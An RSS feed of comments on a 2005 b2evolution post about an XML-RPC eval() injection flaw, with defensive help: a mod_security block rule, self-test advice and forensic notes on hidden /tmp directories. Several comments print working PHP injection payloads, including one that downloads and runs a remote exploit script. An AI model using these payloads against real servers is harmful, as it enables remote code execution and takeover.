http://b2evolution.net/news/?disp=comments en-EU http://backend.userland.com/rss 60 Thu, 24 Nov 2005 18:58:17 +0000 StevensF [Visitor] c7232@http://b2evolution.net/ Keep on the good work.<br /> ]]> http://b2evolution.net/news/2005/08/31/fix_for_xml_rpc_vulnerability_again_1#c7232 Wed, 12 Oct 2005 10:37:31 +0000 jwedgeco [Member] c5200@http://b2evolution.net/ If you can't patch or are extra paranoid, try this mod_security rule<br /> <br /> # block access to b2evolutions xml interface<br /> SecFilterSelective REQUEST_URI "/blogs/xmlsrv/xmlrpc.php"<br />
# block access to b2evolutions xml interface
SecFilterSelective REQUEST_URI "/blogs/xmlsrv/xmlrpc.php"
]]> http://b2evolution.net/news/2005/08/31/fix_for_xml_rpc_vulnerability_again_1#c5200 Fri, 16 Sep 2005 11:58:57 +0000 Enric Naval [Visitor] c4580@http://b2evolution.net/ (continues)<br /> <br /> I don't know the variable that was used for the exploit, but if you ever get to know its name then you can attempt to hack your unpatched weblog using this. Replace "var_name" and "weblog_url". That's <b>your</b> unpatched weblog, not <b>an</b> <img src="http://b2evolution.net/rsc/smilies/icon_smile.gif" title=":)" alt=":)" class="middle" width="15" height="15" /><br /> <br /> (you have to escape the single quotes for "echo" to work)<br /> <br /> <code><br /> echo '<br /> var_name=,\'\');echo \'I got hacked.\';exit;/*<br /> ---<br /> ' | lynx -post_data weblog_url/xmlsrv/xmlrpc.php <br /> </code><br /> <br /> And of course:<br /> <br /> <code><br /> echo '<br /> var_name=,\'\');echo \'Hello, world.\';mail(root,\'p0wned!\',\'Patch b2evolution for XML-RPC.\');exit;/*<br /> ---<br /> ' | lynx -post_data weblog_url/xmlsrv/xmlrpc.php <br /> </code>
I don't know the variable that was used for the exploit, but if you ever get to know its name then you can attempt to hack your unpatched weblog using this. Replace "var_name" and "weblog_url". That's your unpatched weblog, not an

(you have to escape the single quotes for "echo" to work)


echo '
var_name=,\'\');echo \'I got hacked.\';exit;/*
---
' | lynx -post_data weblog_url/xmlsrv/xmlrpc.php


And of course:


echo '
var_name=,\'\');echo \'Hello, world.\';mail(root,\'p0wned!\',\'Patch b2evolution for XML-RPC.\');exit;/*
---
' | lynx -post_data weblog_url/xmlsrv/xmlrpc.php
]]> http://b2evolution.net/news/2005/08/31/fix_for_xml_rpc_vulnerability_again_1#c4580 Fri, 16 Sep 2005 11:56:56 +0000 Enric Naval [Visitor] c4579@http://b2evolution.net/ So, my hacker, as seen in former posts, probably used a query string like this :<br /> <br /> <code><br /> var=,'')); system('wget linuxgods\.go\.ro/local\.tgz; tar -xzf local.tgz /tmp; nohup /tmp/local/exploit.sh&amp;;');exit;/*<br /> </code><br /> <br /> Download the program, uncompress and execute in background using nohup so the program will continue running after its father (the PHP page) has died.<br />

var=,'')); system('wget linuxgods\.go\.ro/local\.tgz; tar -xzf local.tgz /tmp; nohup /tmp/local/exploit.sh&;');exit;/*


Download the program, uncompress and execute in background using nohup so the program will continue running after its father (the PHP page) has died.
]]> http://b2evolution.net/news/2005/08/31/fix_for_xml_rpc_vulnerability_again_1#c4579 Fri, 16 Sep 2005 11:38:31 +0000 Enric Naval [Visitor] c4577@http://b2evolution.net/ According to the explanation for the XML-RPC exploit, the problem is that they use eval() in data extracted from $HTTP_RAW_POST_DATA. <br /> <br /> Gulf Tech report of XML-RPC vulnerability<br /> <br /> They say the problem is that magic_quotes_gpc() isn't applied to $HTTP_RAW_POST_DATA, so you can POST a parameter containing a single quote.<br /> <br /> This single quote, which was not escaped using magic_quotes_gpc(), allows you to end a string with the single quote, add a semicolon ";" to end the actual statement and execute whatever code you fancy.<br /> <br /> So, for example, if you know that the page is reading the variable "var" from the raw POST, you can send this query string.<br /> <br /> <code><br /> var=,'')); phpinfo(); exit;/*<br /> </code><br /> <br /> In this case, I believe that ",''));" finishes correctly the actual call to eval. Everything after the semicolon will be then executed by the server as if it was code in the PHP page.<br /> <br /> "phpinfo();" This executes phpinfo() <br /> "exit;" This exits the PHP page.<br /> "/*" and then it comments the rest of the code, so it won't execute and won't dump error to some log.<br /> <br /> (I will continue later, I have problems posting)
Gulf Tech report of XML-RPC vulnerability

They say the problem is that magic_quotes_gpc() isn't applied to $HTTP_RAW_POST_DATA, so you can POST a parameter containing a single quote.

This single quote, which was not escaped using magic_quotes_gpc(), allows you to end a string with the single quote, add a semicolon ";" to end the actual statement and execute whatever code you fancy.

So, for example, if you know that the page is reading the variable "var" from the raw POST, you can send this query string.


var=,'')); phpinfo(); exit;/*


In this case, I believe that ",''));" finishes correctly the actual call to eval. Everything after the semicolon will be then executed by the server as if it was code in the PHP page.

"phpinfo();" This executes phpinfo()
"exit;" This exits the PHP page.
"/*" and then it comments the rest of the code, so it won't execute and won't dump error to some log.

(I will continue later, I have problems posting)]]> http://b2evolution.net/news/2005/08/31/fix_for_xml_rpc_vulnerability_again_1#c4577 Mon, 05 Sep 2005 03:43:40 +0000 Lenwood [Visitor] c4393@http://b2evolution.net/ Can someone explain how to test this properly?<br /> <br /> Thanks,<br /> Chris
Thanks,
Chris]]> http://b2evolution.net/news/2005/08/31/fix_for_xml_rpc_vulnerability_again_1#c4393 Sat, 03 Sep 2005 19:04:30 +0000 wrabbit [Member] c4278@http://b2evolution.net/ Yeah, they just got me yesterday. Someone used it to upload a mail-sending PHP script, which they used to send out paypal scam emails. My host disabled my site until I was able to figure out how it happened. http://b2evolution.net/news/2005/08/31/fix_for_xml_rpc_vulnerability_again_1#c4278 Sat, 03 Sep 2005 13:06:35 +0000 Enric Naval [Visitor] c4230@http://b2evolution.net/ note: I knew the hacking program hadn't made anything harmful because I looked at ethereal and at the tcpdump output, and there were only the usual traffic plus the IRC connections. I actually executed the program myself to see what it did in the ethereal screen!<br /> <br /> note: I just found a hacking program in /tmp, seems the hacker managed to download the program, but couldn't execute it. If you have had visitors to your xmlrpc file in access_log, and of you run apache as user "apache", look for strange directories in "/tmp" and "/var/tmp" and read this message. <br /> <br /> <br /> The last time I found the downloaded program binaries here:<br /> <br /> /tmp/ /.zbind <br /> <br /> /var/tmp/ /.zbind <br /> <br /> Notice the directory name is a single space. Notice the dot causes the directory not to be displayed when doing "ls -l".<br /> <br /> I had to delete the directory like this:<br /> <br /> rm "/tmp/ "<br /> <br /> To enter the directory<br /> <br /> cd "/tmp/ "<br /> <br /> or<br /> <br /> cd /tmp<br /> cd " "<br /> <br /> <br /> Well, that's all. Good luck with your servers.
note: I just found a hacking program in /tmp, seems the hacker managed to download the program, but couldn't execute it. If you have had visitors to your xmlrpc file in access_log, and of you run apache as user "apache", look for strange directories in "/tmp" and "/var/tmp" and read this message.


The last time I found the downloaded program binaries here:

/tmp/ /.zbind

/var/tmp/ /.zbind

Notice the directory name is a single space. Notice the dot causes the directory not to be displayed when doing "ls -l".

I had to delete the directory like this:

rm "/tmp/ "

To enter the directory

cd "/tmp/ "

or

cd /tmp
cd " "


Well, that's all. Good luck with your servers.]]> http://b2evolution.net/news/2005/08/31/fix_for_xml_rpc_vulnerability_again_1#c4230